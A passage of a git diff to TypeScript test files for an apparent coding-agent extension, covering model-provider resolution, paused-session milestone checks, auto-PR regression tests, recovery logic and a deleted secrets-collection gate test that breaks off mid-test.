+  assert.equal(result.provider, "claude-code", "bare ID must resolve to claude-code when session provider is claude-code");
+});
+
+test("resolveModelId: bare ID still prefers current provider when it is a first-class API provider", () => {
+  const availableModels = [
+    { id: "claude-sonnet-4-6", provider: "anthropic" },
+    { id: "claude-sonnet-4-6", provider: "bedrock" },
+  ];
+
+  const result = resolveModelId("claude-sonnet-4-6", availableModels, "bedrock");
+  assert.ok(result, "should resolve a model");
+  assert.equal(result.provider, "bedrock", "bare ID should prefer current provider when it is a real API provider");
+});
+
+test("resolveModelId: explicit provider/model format still resolves to claude-code when specified", () => {
+  const availableModels = [
+    { id: "claude-sonnet-4-6", provider: "anthropic" },
+    { id: "claude-sonnet-4-6", provider: "claude-code" },
+  ];
+
+  const result = resolveModelId("claude-code/claude-sonnet-4-6", availableModels, "anthropic");
+  assert.ok(result, "should resolve a model");
+  assert.equal(result.provider, "claude-code", "explicit provider prefix must be respected");
+});
+
+test("resolveModelId: bare ID with only one provider works normally", () => {
+  const availableModels = [
+    { id: "claude-sonnet-4-6", provider: "anthropic" },
+  ];
+
+  const result = resolveModelId("claude-sonnet-4-6", availableModels, "anthropic");
+  assert.ok(result, "should resolve a model");
+  assert.equal(result.provider, "anthropic");
+});
+
+test("resolveModelId: bare ID with claude-code as only provider still resolves", () => {
+  const availableModels = [
+    { id: "claude-sonnet-4-6", provider: "claude-code" },
+  ];
+
+  // If claude-code is the ONLY provider for this model, it should still resolve
+  const result = resolveModelId("claude-sonnet-4-6", availableModels, "claude-code");
+  assert.ok(result, "should resolve even when only available via claude-code");
+  assert.equal(result.provider, "claude-code");
+});
+
+// ─── selectAndApplyModel verbose-gating tests ──────────────────────────
+
+test("model change notify in selectAndApplyModel is gated behind verbose flag", () => {
+  // The Model [phase] [tier] notification should only fire when verbose=true.
+  // The dashboard header already shows the active model, so the notification
+  // is redundant noise during auto-mode (#3719).
+  const gsdDir = join(__dirname, "..");
+  const src = readFileSync(join(gsdDir, "auto-model-selection.ts"), "utf-8");
+
+  // Find the block where setModel succeeds (appliedModel = model) and
+  // verify notify is inside an `if (verbose)` guard.
+  const setModelBlock = src.match(
+    /const ok = await pi\.setModel\(model[\s\S]*?appliedModel = model;([\s\S]*?)break;/,
+  );
+  assert.ok(setModelBlock, "should find the setModel success block");
+
+  const blockBody = setModelBlock![1];
+  // The notify call must be inside an if (verbose) block
+  assert.ok(
+    blockBody.includes("if (verbose)"),
+    "Model change ctx.ui.notify must be gated behind if (verbose) to avoid auto-mode notification noise",
+  );
+  assert.ok(
+    blockBody.includes("ctx.ui.notify"),
+    "notify call should still exist (just verbose-gated)",
+  );
+});
+
+test("resolveModelId: anthropic wins over claude-code when session provider is not claude-code", () => {
+  const availableModels = [
+    { id: "claude-sonnet-4-6", provider: "claude-code" },
+    { id: "claude-sonnet-4-6", provider: "anthropic" },
+  ];
+
+  // When the session is NOT on claude-code, bare IDs should resolve to
+  // the canonical anthropic provider (original #2905 behavior preserved).
+  const result = resolveModelId("claude-sonnet-4-6", availableModels, undefined);
+  assert.ok(result, "should resolve a model");
+  assert.equal(result.provider, "anthropic", "anthropic must win when session is not claude-code");
+});
+
+test("resolveModelId: claude-code wins when session is claude-code regardless of list order", () => {
+  const availableModels = [
+    { id: "claude-sonnet-4-6", provider: "claude-code" },
+    { id: "claude-sonnet-4-6", provider: "anthropic" },
+  ];
+
+  // When session provider is claude-code (subscription user migration), it must
+  // win regardless of candidate ordering to avoid the third-party block (#3772).
+  const result = resolveModelId("claude-sonnet-4-6", availableModels, "claude-code");
+  assert.ok(result, "should resolve a model");
+  assert.equal(result.provider, "claude-code", "claude-code must win when it is the session provider");
+});
diff --git a/src/resources/extensions/gsd/tests/auto-paused-session-validation.test.ts b/src/resources/extensions/gsd/tests/auto-paused-session-validation.test.ts
index addbefa22..0b24f2a3f 100644
--- a/src/resources/extensions/gsd/tests/auto-paused-session-validation.test.ts
+++ b/src/resources/extensions/gsd/tests/auto-paused-session-validation.test.ts
@@ -51,93 +51,79 @@ function cleanup(base: string): void {
   try { rmSync(base, { recursive: true, force: true }); } catch { /* */ }
 }
 
-test("resolveMilestonePath returns null for missing milestone", () => {
+test("resolveMilestonePath returns null for missing milestone", (t) => {
   const base = makeTmpBase();
   mkdirSync(join(base, ".gsd", "milestones"), { recursive: true });
-  try {
-    const result = resolveMilestonePath(base, "M999");
-    assert.equal(result, null, "should return null for non-existent milestone");
-  } finally {
-    cleanup(base);
-  }
+  t.after(() => cleanup(base));
+
+  const result = resolveMilestonePath(base, "M999");
+  assert.equal(result, null, "should return null for non-existent milestone");
 });
 
-test("resolveMilestonePath returns path for existing milestone", () => {
+test("resolveMilestonePath returns path for existing milestone", (t) => {
   const base = makeTmpBase();
   mkdirSync(join(base, ".gsd", "milestones", "M001"), { recursive: true });
-  try {
-    const result = resolveMilestonePath(base, "M001");
-    assert.ok(result, "should return a path for existing milestone");
-    assert.ok(result.includes("M001"), "path should contain the milestone ID");
-  } finally {
-    cleanup(base);
-  }
+  t.after(() => cleanup(base));
+
+  const result = resolveMilestonePath(base, "M001");
+  assert.ok(result, "should return a path for existing milestone");
+  assert.ok(result.includes("M001"), "path should contain the milestone ID");
 });
 
-test("resolveMilestoneFile returns null when no SUMMARY exists", () => {
+test("resolveMilestoneFile returns null when no SUMMARY exists", (t) => {
   const base = makeTmpBase();
   mkdirSync(join(base, ".gsd", "milestones", "M001"), { recursive: true });
-  try {
-    const result = resolveMilestoneFile(base, "M001", "SUMMARY");
-    assert.equal(result, null, "should return null when no SUMMARY file");
-  } finally {
-    cleanup(base);
-  }
+  t.after(() => cleanup(base));
+
+  const result = resolveMilestoneFile(base, "M001", "SUMMARY");
+  assert.equal(result, null, "should return null when no SUMMARY file");
 });
 
-test("resolveMilestoneFile returns path when SUMMARY exists (completed)", () => {
+test("resolveMilestoneFile returns path when SUMMARY exists (completed)", (t) => {
   const base = makeTmpBase();
   const mDir = join(base, ".gsd", "milestones", "M001");
   mkdirSync(mDir, { recursive: true });
   writeFileSync(join(mDir, "M001-SUMMARY.md"), "# Summary\nDone.");
-  try {
-    const result = resolveMilestoneFile(base, "M001", "SUMMARY");
-    assert.ok(result, "should return a path when SUMMARY exists");
-    assert.ok(result.includes("SUMMARY"), "path should reference SUMMARY");
-  } finally {
-    cleanup(base);
-  }
+  t.after(() => cleanup(base));
+
+  const result = resolveMilestoneFile(base, "M001", "SUMMARY");
+  assert.ok(result, "should return a path when SUMMARY exists");
+  assert.ok(result.includes("SUMMARY"), "path should reference SUMMARY");
 });
 
 // ─── Combined validation logic (mirrors auto.ts resume guard) ───────────────
 
-test("stale milestone: missing dir means paused session should be discarded", () => {
+test("stale milestone: missing dir means paused session should be discarded", (t) => {
   const base = makeTmpBase();
   mkdirSync(join(base, ".gsd", "milestones"), { recursive: true });
-  try {
-    const mDir = resolveMilestonePath(base, "M999");
-    const summaryFile = resolveMilestoneFile(base, "M999", "SUMMARY");
-    const isStale = !mDir || !!summaryFile;
-    assert.ok(isStale, "milestone that doesn't exist should be detected as stale");
-  } finally {
-    cleanup(base);
-  }
+  t.after(() => cleanup(base));
+
+  const mDir = resolveMilestonePath(base, "M999");
+  const summaryFile = resolveMilestoneFile(base, "M999", "SUMMARY");
+  const isStale = !mDir || !!summaryFile;
+  assert.ok(isStale, "milestone that doesn't exist should be detected as stale");
 });
 
-test("stale milestone: completed (has SUMMARY) means paused session should be discarded", () => {
+test("stale milestone: completed (has SUMMARY) means paused session should be discarded", (t) => {
   const base = makeTmpBase();
   const mDir = join(base, ".gsd", "milestones", "M001");
   mkdirSync(mDir, { recursive: true });
   writeFileSync(join(mDir, "M001-SUMMARY.md"), "# Summary\nDone.");
-  try {
-    const dir = resolveMilestonePath(base, "M001");
-    const summaryFile = resolveMilestoneFile(base, "M001", "SUMMARY");
-    const isStale = !dir || !!summaryFile;
-    assert.ok(isStale, "milestone with SUMMARY should be detected as stale");
-  } finally {
-    cleanup(base);
-  }
+  t.after(() => cleanup(base));
+
+  const dir = resolveMilestonePath(base, "M001");
+  const summaryFile = resolveMilestoneFile(base, "M001", "SUMMARY");
+  const isStale = !dir || !!summaryFile;
+  assert.ok(isStale, "milestone with SUMMARY should be detected as stale");
 });
 
-test("valid milestone: exists and has no SUMMARY means paused session is valid", () => {
+test("valid milestone: exists and has no SUMMARY means paused session is valid", (t) => {
   const base = makeTmpBase();
   mkdirSync(join(base, ".gsd", "milestones", "M001"), { recursive: true });
-  try {
-    const dir = resolveMilestonePath(base, "M001");
-    const summaryFile = resolveMilestoneFile(base, "M001", "SUMMARY");
-    const isStale = !dir || !!summaryFile;
-    assert.ok(!isStale, "active milestone should not be detected as stale");
-  } finally {
-    cleanup(base);
-  }
+  t.after(() => cleanup(base));
+
+  const dir = resolveMilestonePath(base, "M001");
+  const summaryFile = resolveMilestoneFile(base, "M001", "SUMMARY");
+  const isStale = !dir || !!summaryFile;
+  assert.ok(!isStale, "active milestone should not be detected as stale");
 });
diff --git a/src/resources/extensions/gsd/tests/auto-pr-bugs.test.ts b/src/resources/extensions/gsd/tests/auto-pr-bugs.test.ts
new file mode 100644
index 000000000..003d8d10d
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/auto-pr-bugs.test.ts
@@ -0,0 +1,88 @@
+/**
+ * auto-pr-bugs.test.ts — Regression tests for #2302.
+ *
+ * Three interacting bugs prevented auto_pr from ever creating a PR:
+ * 1. auto_pr was gated on `pushed` (which requires auto_push)
+ * 2. Milestone branch was not pushed to remote before PR creation
+ * 3. createDraftPR in git-service.ts lacked --head/--base parameters
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join } from "node:path";
+
+// ─── Bug 1: auto_pr should not depend on auto_push / pushed flag ────────────
+
+const autoWorktreeSrcPath = join(import.meta.dirname, "..", "auto-worktree.ts");
+const autoWorktreeSrc = readFileSync(autoWorktreeSrcPath, "utf-8");
+
+test("#2302 bug 1: auto_pr condition should not require pushed flag", () => {
+  // Find the auto_pr block in mergeMilestoneToMain
+  const autoPrIdx = autoWorktreeSrc.indexOf("auto_pr");
+  assert.ok(autoPrIdx !== -1, "auto_pr reference exists in auto-worktree.ts");
+
+  // Get context around the auto_pr check
+  const lineStart = autoWorktreeSrc.lastIndexOf("\n", autoPrIdx) + 1;
+  const lineEnd = autoWorktreeSrc.indexOf("\n", autoPrIdx);
+  const autoPrLine = autoWorktreeSrc.slice(lineStart, lineEnd);
+
+  // The condition should NOT include `&& pushed`
+  assert.ok(
+    !autoPrLine.includes("&& pushed"),
+    "auto_pr condition should not be gated on pushed flag (auto_push dependency)",
+  );
+});
+
+// ─── Bug 2: phases.ts should not duplicate PR creation ──────────────────────
+
+const phasesSrcPath = join(import.meta.dirname, "..", "auto", "phases.ts");
+const phasesSrc = readFileSync(phasesSrcPath, "utf-8");
+
+test("#2302 bug 2: phases.ts should not call createDraftPR (handled by mergeMilestoneToMain)", () => {
+  // After fix, phases.ts should not import or call createDraftPR because
+  // PR creation is handled inside mergeMilestoneToMain in auto-worktree.ts
+  const createDraftPRCalls = phasesSrc.match(/createDraftPR\(/g) || [];
+
+  assert.equal(
+    createDraftPRCalls.length,
+    0,
+    "phases.ts should not call createDraftPR — it's handled by mergeMilestoneToMain",
+  );
+});
+
+// ─── Bug 3: createDraftPR should accept head and base branch parameters ─────
+
+const gitServiceSrcPath = join(import.meta.dirname, "..", "git-service.ts");
+const gitServiceSrc = readFileSync(gitServiceSrcPath, "utf-8");
+
+test("#2302 bug 3: createDraftPR should accept head and base branch parameters", () => {
+  // Find the createDraftPR function signature
+  const fnIdx = gitServiceSrc.indexOf("function createDraftPR");
+  assert.ok(fnIdx !== -1, "createDraftPR function exists");
+
+  // Get the function signature (up to the closing paren)
+  const sigEnd = gitServiceSrc.indexOf(")", fnIdx);
+  const signature = gitServiceSrc.slice(fnIdx, sigEnd);
+
+  // Should have head and base parameters
+  assert.ok(
+    signature.includes("head") || signature.includes("branch"),
+    "createDraftPR should accept a head/branch parameter",
+  );
+});
+
+test("#2302 bug 3: createDraftPR should pass --head and --base to gh pr create", () => {
+  const fnIdx = gitServiceSrc.indexOf("function createDraftPR");
+  const fnEnd = gitServiceSrc.indexOf("\n}", fnIdx);
+  const fnBody = gitServiceSrc.slice(fnIdx, fnEnd);
+
+  assert.ok(
+    fnBody.includes("--head"),
+    "createDraftPR should pass --head to gh pr create",
+  );
+  assert.ok(
+    fnBody.includes("--base"),
+    "createDraftPR should pass --base to gh pr create",
+  );
+});
diff --git a/src/resources/extensions/gsd/tests/auto-recovery.test.ts b/src/resources/extensions/gsd/tests/auto-recovery.test.ts
index c1a3d0faf..37092d3df 100644
--- a/src/resources/extensions/gsd/tests/auto-recovery.test.ts
+++ b/src/resources/extensions/gsd/tests/auto-recovery.test.ts
@@ -1,22 +1,19 @@
-import test from "node:test";
+import test, { afterEach } from "node:test";
 import assert from "node:assert/strict";
-import { mkdirSync, writeFileSync, existsSync, readFileSync, rmSync } from "node:fs";
+import { mkdtempSync, mkdirSync, rmSync, writeFileSync, existsSync, readFileSync } from "node:fs";
 import { join } from "node:path";
 import { tmpdir } from "node:os";
 import { randomUUID } from "node:crypto";
 
-import {
-  resolveExpectedArtifactPath,
-  verifyExpectedArtifact,
-  diagnoseExpectedArtifact,
-  buildLoopRemediationSteps,
-  selfHealRuntimeRecords,
-  hasImplementationArtifacts,
-} from "../auto-recovery.ts";
-import { parseRoadmap, clearParseCache } from "../files.ts";
+import { verifyExpectedArtifact, hasImplementationArtifacts, resolveExpectedArtifactPath, diagnoseExpectedArtifact, buildLoopRemediationSteps } from "../auto-recovery.ts";
+import { openDatabase, closeDatabase, insertMilestone, insertSlice, insertGateRow } from "../gsd-db.ts";
+import { clearParseCache } from "../files.ts";
+import { parseRoadmap } from "../parsers-legacy.ts";
 import { invalidateAllCaches } from "../cache.ts";
 import { deriveState, invalidateStateCache } from "../state.ts";
 
+const tmpDirs: string[] = [];
+
 function makeTmpBase(): string {
   const base = join(tmpdir(), `gsd-test-${randomUUID()}`);
   // Create .gsd/milestones/M001/slices/S01/tasks/ structure
@@ -28,18 +25,34 @@ function cleanup(base: string): void {
   try { rmSync(base, { recursive: true, force: true }); } catch { /* */ }
 }
 
-// ─── resolveExpectedArtifactPath ──────────────────────────────────────────
+function makeTmpProject(): string {
+  const dir = mkdtempSync(join(tmpdir(), "auto-recovery-"));
+  mkdirSync(join(dir, ".gsd"), { recursive: true });
+  openDatabase(join(dir, ".gsd", "gsd.db"));
+  insertMilestone({ id: "M001", title: "Test Milestone", status: "active" });
+  insertSlice({
+    milestoneId: "M001",
+    id: "S01",
+    title: "Test Slice",
+    status: "pending",
+    risk: "low",
+    depends: [],
+  });
+  insertGateRow({ milestoneId: "M001", sliceId: "S01", gateId: "Q3", scope: "slice" });
+  tmpDirs.push(dir);
+  return dir;
+}
 
-test("resolveExpectedArtifactPath returns correct path for research-milestone", () => {
-  const base = makeTmpBase();
-  try {
-    const result = resolveExpectedArtifactPath("research-milestone", "M001", base);
-    assert.ok(result);
-    assert.ok(result!.includes("M001"));
-    assert.ok(result!.includes("RESEARCH"));
-  } finally {
-    cleanup(base);
+afterEach(() => {
+  closeDatabase();
+  for (const dir of tmpDirs) {
+    try {
+      rmSync(dir, { recursive: true, force: true });
+    } catch {
+      // Best-effort cleanup only.
+    }
   }
+  tmpDirs.length = 0;
 });
 
 test("resolveExpectedArtifactPath returns correct path for execute-task", () => {
@@ -114,7 +127,7 @@ test("resolveExpectedArtifactPath returns correct path for all slice-level types
 
     const uatResult = resolveExpectedArtifactPath("run-uat", "M001/S01", base);
     assert.ok(uatResult);
-    assert.ok(uatResult!.includes("UAT-RESULT"));
+    assert.ok(uatResult!.includes("ASSESSMENT"));
   } finally {
     cleanup(base);
   }
@@ -158,8 +171,7 @@ test("buildLoopRemediationSteps returns steps for execute-task", () => {
     const steps = buildLoopRemediationSteps("execute-task", "M001/S01/T01", base);
     assert.ok(steps);
     assert.ok(steps!.includes("T01"));
-    assert.ok(steps!.includes("gsd doctor"));
-    assert.ok(steps!.includes("[x]"));
+    assert.ok(steps!.includes("gsd undo-task"));
   } finally {
     cleanup(base);
   }
@@ -171,7 +183,7 @@ test("buildLoopRemediationSteps returns steps for plan-slice", () => {
     const steps = buildLoopRemediationSteps("plan-slice", "M001/S01", base);
     assert.ok(steps);
     assert.ok(steps!.includes("PLAN"));
-    assert.ok(steps!.includes("gsd doctor"));
+    assert.ok(steps!.includes("gsd recover"));
   } finally {
     cleanup(base);
   }
@@ -183,7 +195,7 @@ test("buildLoopRemediationSteps returns steps for complete-slice", () => {
     const steps = buildLoopRemediationSteps("complete-slice", "M001/S01", base);
     assert.ok(steps);
     assert.ok(steps!.includes("S01"));
-    assert.ok(steps!.includes("ROADMAP"));
+    assert.ok(steps!.includes("gsd reset-slice"));
   } finally {
     cleanup(base);
   }
@@ -510,7 +522,7 @@ test("verifyExpectedArtifact accepts plan-slice with colon-style heading tasks (
   }
 });
 
-test("verifyExpectedArtifact execute-task passes for heading-style plan entry (#1691)", () => {
+test("verifyExpectedArtifact execute-task requires checked checkbox or DB status for heading-style plan entry (#1691, #3607)", () => {
   const base = makeTmpBase();
   try {
     const sliceDir = join(base, ".gsd", "milestones", "M001", "slices", "S01");
@@ -526,97 +538,18 @@ test("verifyExpectedArtifact execute-task passes for heading-style plan entry (#
       "Feature description.",
     ].join("\n"));
     writeFileSync(join(tasksDir, "T01-SUMMARY.md"), "# T01 Summary\n\nDone.");
+    // Without DB or checked checkbox, heading-style plans cannot verify
+    // execute-task completion (summary file alone is insufficient, #3607)
     assert.strictEqual(
       verifyExpectedArtifact("execute-task", "M001/S01/T01", base),
-      true,
-      "execute-task should pass for heading-style plan entry when summary exists",
+      false,
+      "execute-task requires DB status or checked checkbox, not just heading + summary (#3607)",
     );
   } finally {
     cleanup(base);
   }
 });
 
-// ─── selfHealRuntimeRecords — worktree base path (#769) ──────────────────
-
-test("selfHealRuntimeRecords clears stale dispatched records (#769)", async () => {
-  // selfHealRuntimeRecords now only clears stale dispatched records (>1h).
-  // No completedKeySet parameter — deriveState is sole authority.
-  const worktreeBase = makeTmpBase();
-  const mainBase = makeTmpBase();
-  try {
-    const { writeUnitRuntimeRecord, readUnitRuntimeRecord } = await import("../unit-runtime.ts");
-
-    // Write a stale runtime record in the worktree .gsd/runtime/units/
-    writeUnitRuntimeRecord(worktreeBase, "run-uat", "M001/S01", Date.now() - 7200_000, {
-      phase: "dispatched",
-    });
-
-    // Verify the runtime record exists before heal
-    const before = readUnitRuntimeRecord(worktreeBase, "run-uat", "M001/S01");
-    assert.ok(before, "runtime record should exist before heal");
-
-    // Mock ExtensionContext with minimal notify
-    const notifications: string[] = [];
-    const mockCtx = {
-      ui: { notify: (msg: string) => { notifications.push(msg); } },
-    } as any;
-
-    // Call selfHeal with worktreeBase — should clear the stale record
-    await selfHealRuntimeRecords(worktreeBase, mockCtx);
-
-    // The stale record should be cleared
-    const after = readUnitRuntimeRecord(worktreeBase, "run-uat", "M001/S01");
-    assert.equal(after, null, "runtime record should be cleared after heal");
-    assert.ok(notifications.some(n => n.includes("Self-heal")), "should emit self-heal notification");
-
-    // Write a stale record at mainBase
-    writeUnitRuntimeRecord(mainBase, "run-uat", "M001/S01", Date.now() - 7200_000, {
-      phase: "dispatched",
-    });
-    await selfHealRuntimeRecords(mainBase, mockCtx);
-
-    // The record at mainBase should also be cleared by the stale timeout (>1h)
-    const afterMain = readUnitRuntimeRecord(mainBase, "run-uat", "M001/S01");
-    assert.equal(afterMain, null, "stale record at main base should be cleared by timeout");
-  } finally {
-    cleanup(worktreeBase);
-    cleanup(mainBase);
-  }
-});
-
-// ─── #1625: selfHealRuntimeRecords on resume clears paused-session leftovers ──
-
-test("selfHealRuntimeRecords clears recently-paused dispatched records on resume (#1625)", async () => {
-  // When pauseAuto closes out a unit but clearUnitRuntimeRecord silently fails
-  // (e.g. permission error), selfHealRuntimeRecords on resume should still
-  // clean up stale dispatched records that are >1h old.
-  const base = makeTmpBase();
-  try {
-    const { writeUnitRuntimeRecord, readUnitRuntimeRecord } = await import("../unit-runtime.ts");
-
-    // Simulate a record left behind after a pause — aged >1h to be considered stale
-    writeUnitRuntimeRecord(base, "execute-task", "M001/S01/T01", Date.now() - 3700_000, {
-      phase: "dispatched",
-    });
-
-    const before = readUnitRuntimeRecord(base, "execute-task", "M001/S01/T01");
-    assert.ok(before, "dispatched record should exist before resume heal");
-    assert.equal(before!.phase, "dispatched");
-
-    const notifications: string[] = [];
-    const mockCtx = {
-      ui: { notify: (msg: string) => { notifications.push(msg); } },
-    } as any;
-
-    await selfHealRuntimeRecords(base, mockCtx);
-
-    const after = readUnitRuntimeRecord(base, "execute-task", "M001/S01/T01");
-    assert.equal(after, null, "stale dispatched record should be cleared on resume (#1625)");
-  } finally {
-    cleanup(base);
-  }
-});
-
 // ─── #793: invalidateAllCaches unblocks skip-loop ─────────────────────────
 // When the skip-loop breaker fires, it must call invalidateAllCaches() (not
 // just invalidateStateCache()) to clear path/parse caches that deriveState
@@ -698,7 +631,7 @@ test("hasImplementationArtifacts returns false when only .gsd/ files committed (
     execFileSync("git", ["commit", "-m", "chore: add plan files"], { cwd: base, stdio: "ignore" });
 
     const result = hasImplementationArtifacts(base);
-    assert.equal(result, false, "should return false when only .gsd/ files were committed");
+    assert.equal(result, "absent", "should return absent when only .gsd/ files were committed");
   } finally {
     cleanup(base);
   }
@@ -717,7 +650,7 @@ test("hasImplementationArtifacts returns true when implementation files committe
     execFileSync("git", ["commit", "-m", "feat: add feature"], { cwd: base, stdio: "ignore" });
 
     const result = hasImplementationArtifacts(base);
-    assert.equal(result, true, "should return true when implementation files are present");
+    assert.equal(result, "present", "should return present when implementation files are present");
   } finally {
     cleanup(base);
   }
@@ -728,7 +661,7 @@ test("hasImplementationArtifacts returns true on non-git directory (fail-open)",
   mkdirSync(base, { recursive: true });
   try {
     const result = hasImplementationArtifacts(base);
-    assert.equal(result, true, "should return true (fail-open) in non-git directory");
+    assert.equal(result, "unknown", "should return unknown (fail-open) in non-git directory");
   } finally {
     cleanup(base);
   }
@@ -771,3 +704,11 @@ test("verifyExpectedArtifact complete-milestone passes with impl files (#1703)",
     cleanup(base);
   }
 });
+
+test("verifyExpectedArtifact checks pending gate-evaluate artifacts without ESM require failures", () => {
+  const base = makeTmpProject();
+
+  const verified = verifyExpectedArtifact("gate-evaluate", "M001/S01/gates+Q3", base);
+
+  assert.equal(verified, false, "pending gates should keep gate-evaluate unverified");
+});
diff --git a/src/resources/extensions/gsd/tests/auto-remediate-slice-status.test.ts b/src/resources/extensions/gsd/tests/auto-remediate-slice-status.test.ts
new file mode 100644
index 000000000..552096d00
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/auto-remediate-slice-status.test.ts
@@ -0,0 +1,56 @@
+/**
+ * Regression test for #3673 — auto-remediate stale slice DB status
+ *
+ * When complete-slice fails after writing SUMMARY.md but before calling
+ * updateSliceStatus(), the DB stays stale and the post-unit check
+ * previously reported this as a "rogue" artifact, causing infinite
+ * re-dispatch. The fix calls updateSliceStatus() to sync the DB.
+ *
+ * This structural test verifies updateSliceStatus is imported and called
+ * in the complete-slice branch of auto-post-unit.ts.
+ */
+
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
+import { readFileSync } from 'node:fs';
+import { fileURLToPath } from 'node:url';
+import { dirname, join } from 'node:path';
+
+const __filename = fileURLToPath(import.meta.url);
+const __dirname = dirname(__filename);
+
+const source = readFileSync(join(__dirname, '..', 'auto-post-unit.ts'), 'utf-8');
+
+describe('auto-remediate stale slice status (#3673)', () => {
+  test('updateSliceStatus is imported from gsd-db', () => {
+    assert.match(source, /import\s*\{[^}]*updateSliceStatus[^}]*\}\s*from\s*["']\.\/gsd-db/,
+      'updateSliceStatus should be imported from gsd-db');
+  });
+
+  test('updateSliceStatus is called with "complete" status', () => {
+    assert.match(source, /updateSliceStatus\(mid,\s*sid,\s*["']complete["']/,
+      'updateSliceStatus should be called with "complete" status');
+  });
+
+  test('remediation is wrapped in try-catch for fallback to rogue detection', () => {
+    // The updateSliceStatus call should be in a try block with a catch
+    // that falls back to rogues.push
+    const updateIdx = source.indexOf('updateSliceStatus(mid, sid');
+    assert.ok(updateIdx > 0, 'updateSliceStatus call should exist');
+
+    // Find surrounding try-catch
+    const before = source.slice(Math.max(0, updateIdx - 200), updateIdx);
+    assert.match(before, /try\s*\{/,
+      'updateSliceStatus should be inside a try block');
+
+    const after = source.slice(updateIdx, updateIdx + 300);
+    assert.match(after, /catch/,
+      'try block should have a catch for fallback');
+  });
+
+  test('rogue detection still exists as fallback', () => {
+    // rogues.push should appear in the catch block
+    assert.match(source, /rogues\.push\(\{.*path:\s*summaryPath/,
+      'rogues.push fallback should still exist');
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/auto-secrets-gate.test.ts b/src/resources/extensions/gsd/tests/auto-secrets-gate.test.ts
deleted file mode 100644
index a7512634f..000000000
--- a/src/resources/extensions/gsd/tests/auto-secrets-gate.test.ts
+++ /dev/null
@@ -1,196 +0,0 @@
-/**
- * Integration tests for the secrets collection gate in startAuto().
- *
- * Exercises getManifestStatus() → collectSecretsFromManifest() composition
- * end-to-end using real filesystem state. Proves the three gate paths:
- *   1. No manifest exists — gate skips silently
- *   2. Pending keys exist — gate triggers collection
- *   3. No pending keys — gate skips silently
- *
- * Uses temp directories with real .gsd/milestones/M001/ structure, mirroring
- * the pattern from manifest-status.test.ts.
- */
-
-import test from 'node:test';
-import assert from 'node:assert/strict';
-import { mkdirSync, writeFileSync, readFileSync, rmSync } from 'node:fs';
-import { join } from 'node:path';
-import { tmpdir } from 'node:os';
-import { getManifestStatus } from '../files.ts';
-import { collectSecretsFromManifest } from '../../get-secrets-from-user.ts';
-
-function makeTempDir(prefix: string): string {
-  const dir = join(tmpdir(), `${prefix}-${Date.now()}-${Math.random().toString(36).slice(2)}`);
-  mkdirSync(dir, { recursive: true });
-  return dir;
-}
-
-/** Create the .gsd/milestones/M001/ directory structure and write a secrets manifest. */
-function writeManifest(base: string, content: string): void {
-  const mDir = join(base, '.gsd', 'milestones', 'M001');
-  mkdirSync(mDir, { recursive: true });
-  writeFileSync(join(mDir, 'M001-SECRETS.md'), content);
-}
-
-/** Stub ctx with hasUI: false — collectOneSecret returns null (skip), showSecretsSummary is a no-op. */
-function makeNoUICtx(cwd: string) {
-  return {
-    ui: {},
-    hasUI: false,
-    cwd,
-  };
-}
-
-// ─── Scenario 1: No manifest exists ──────────────────────────────────────────
-
-test('secrets gate: no manifest exists — getManifestStatus returns null', async () => {
-  const tmp = makeTempDir('gate-no-manifest');
-  try {
-    // No .gsd directory at all
-    const result = await getManifestStatus(tmp, 'M001');
-    assert.strictEqual(result, null, 'should return null when no manifest file exists');
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
-});
-
-// ─── Scenario 2: Pending keys exist ─────────────────────────────────────────
-
-test('secrets gate: pending keys exist — gate triggers collection, manifest updated on disk', async () => {
-  const tmp = makeTempDir('gate-pending');
-  const savedA = process.env.GSD_GATE_TEST_EXISTING;
-  try {
-    // Simulate one key already in env
-    process.env.GSD_GATE_TEST_EXISTING = 'already-here';
-
-    // Ensure pending keys are NOT in env
-    delete process.env.GSD_GATE_TEST_PEND_A;
-    delete process.env.GSD_GATE_TEST_PEND_B;
-
-    writeManifest(tmp, `# Secrets Manifest
-
-**Milestone:** M001
-**Generated:** 2025-06-20T10:00:00Z
-
-### GSD_GATE_TEST_PEND_A
-
-**Service:** ServiceA
-**Status:** pending
-**Destination:** dotenv
-
-1. Get key A from dashboard
-
-### GSD_GATE_TEST_PEND_B
-
-**Service:** ServiceB
-**Status:** pending
-**Destination:** dotenv
-
-1. Get key B from dashboard
-
-### GSD_GATE_TEST_EXISTING
-
-**Service:** ServiceC
-**Status:** pending
-**Destination:** dotenv
-
-1. Already in env
-`);
-
-    // (a) Verify getManifestStatus shows pending keys
-    const status = await getManifestStatus(tmp, 'M001');
-    assert.notStrictEqual(status, null, 'manifest should exist');
-    assert.ok(status!.pending.length > 0, 'should have pending keys');
-    assert.deepStrictEqual(status!.pending, ['GSD_GATE_TEST_PEND_A', 'GSD_GATE_TEST_PEND_B'], 'pending keys');
-    assert.deepStrictEqual(status!.existing, ['GSD_GATE_TEST_EXISTING'], 'existing keys');
-
-    // (b) Call collectSecretsFromManifest with no-UI context
-    // With hasUI: false, collectOneSecret returns null → pending keys become "skipped"
-    const result = await collectSecretsFromManifest(tmp, 'M001', makeNoUICtx(tmp));
-
-    // (c) Verify return shape
-    assert.deepStrictEqual(result.applied, [], 'no keys applied (no UI to enter values)');
-    assert.ok(result.skipped.includes('GSD_GATE_TEST_PEND_A'), 'PEND_A should be skipped');
-    assert.ok(result.skipped.includes('GSD_GATE_TEST_PEND_B'), 'PEND_B should be skipped');
-    assert.deepStrictEqual(result.existingSkipped, ['GSD_GATE_TEST_EXISTING']);
-
-    // (d) Verify manifest on disk was updated — pending entries that went through
-    // collection are now "skipped". The existing-in-env entry retains its manifest
-    // status ("pending") because collectSecretsFromManifest only updates entries
-    // that flow through collectOneSecret. At runtime, getManifestStatus overrides
-    // env-present entries to "existing" regardless of manifest status.
-    const manifestPath = join(tmp, '.gsd', 'milestones', 'M001', 'M001-SECRETS.md');
-    const updatedContent = readFileSync(manifestPath, 'utf8');
-    assert.ok(
-      updatedContent.includes('**Status:** skipped'),
-      'formerly-pending entries should now have status "skipped" in the manifest file',
-    );
-    // Count: PEND_A → skipped, PEND_B → skipped, EXISTING stays pending on disk
-    const skippedMatches = updatedContent.match(/\*\*Status:\*\* skipped/g);
-    assert.strictEqual(skippedMatches?.length, 2, 'two entries should have status "skipped"');
